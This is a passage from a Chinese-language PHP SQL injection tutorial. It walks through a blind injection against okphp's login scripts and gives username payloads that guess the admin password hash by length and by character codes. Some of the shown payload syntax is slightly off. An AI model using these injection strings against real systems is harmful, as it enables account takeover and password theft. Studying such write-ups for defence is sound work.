构造2:就象asp跨库查询一样,直接利用union select构造语句,使返回结果不同来猜解,这种方法可以绕过单引号(magic_gpc=on)继续注射,不过在php里这种注射相对困难,根据具体的代码而定。具体的语句构造请参考pinkeyes 的文章《php注入实例》。下面我就结合okphp给个利用“返回结果不同”注射的例子:(见漏洞5)。
5.admin/login.php和users/login.php通过sql语句构造可以猜解得到指定用户密码hash:(其实这个和漏洞1和2是同一个,这里单独拿出来,主要是说明语句构造的方法。)
问题代码同漏洞1。
语句的构造(ps:因为语句本身就是对用户库操作就没必要用union了):
$username=admin' AND LENGTH(password)=6#
sql语句变成:
$q = "select id,group_id from $user_table where username='admin' AND LENGTH(password)=6#' and password='$password'"
相当于:
$q = "select id,group_id from $user_table where username='admin' AND LENGTH(password)=6'"
如果LENGTH(password)=6成立,则正常返回,如果不成立,mysql就会报错。
这样我们就可以猜解用户admin密码hash了。如$username=admin' ord(substring(password,1,1))=57#
可以猜用户的密码第一位的ascii码值............。
